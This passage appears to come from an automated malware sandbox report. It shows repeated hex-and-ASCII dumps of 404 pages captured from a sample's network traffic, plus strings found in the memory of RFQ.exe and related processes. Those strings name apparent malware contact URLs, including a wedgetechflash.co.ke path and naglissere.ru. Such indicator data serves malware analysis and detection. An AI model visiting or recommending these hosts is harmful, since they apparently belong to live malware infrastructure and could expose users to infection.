75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 10:02:43 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 10:02:45 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 10:02:48 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=7nERBm9qcGQS1BK4u13e; Domain=.naglissere.ru; HttpOnly; Path=/; Expires=Wed, 16-Apr-2025 10:02:54 GMTDate: Tue, 16 Apr 2024 10:02:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=kegewplNQENTSIE1Q7qY; Domain=.naglissere.ru; HttpOnly; Path=/; Expires=Wed, 16-Apr-2025 10:02:56 GMTDate: Tue, 16 Apr 2024 10:02:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=0uihN83ZkchmiEoJtwrf; Domain=.naglissere.ru; HttpOnly; Path=/; Expires=Wed, 16-Apr-2025 10:02:59 GMTDate: Tue, 16 Apr 2024 10:02:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=FsLO3Xo3enk5xsnyCzPb; Domain=.naglissere.ru; HttpOnly; Path=/; Expires=Wed, 16-Apr-2025 10:03:02 GMTDate: Tue, 16 Apr 2024 10:03:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"X-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 16 Apr 2024 10:03:19 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
            Source: RFQ.exe, 00000000.00000002.2009924751.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: icacls.exe, 00000008.00000002.4432678458.00000000050E6000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003DE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wedgetechflash.co.ke/bnz5/?gr=1jaEnVPJQbBr8WwKNEfMHYGZjhye5aSOWdurwFccCTE0UU1/
            Source: KdNqCjDpwdLOuI.exe, 0000000A.00000002.4433484681.00000000050AF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.naglissere.ru
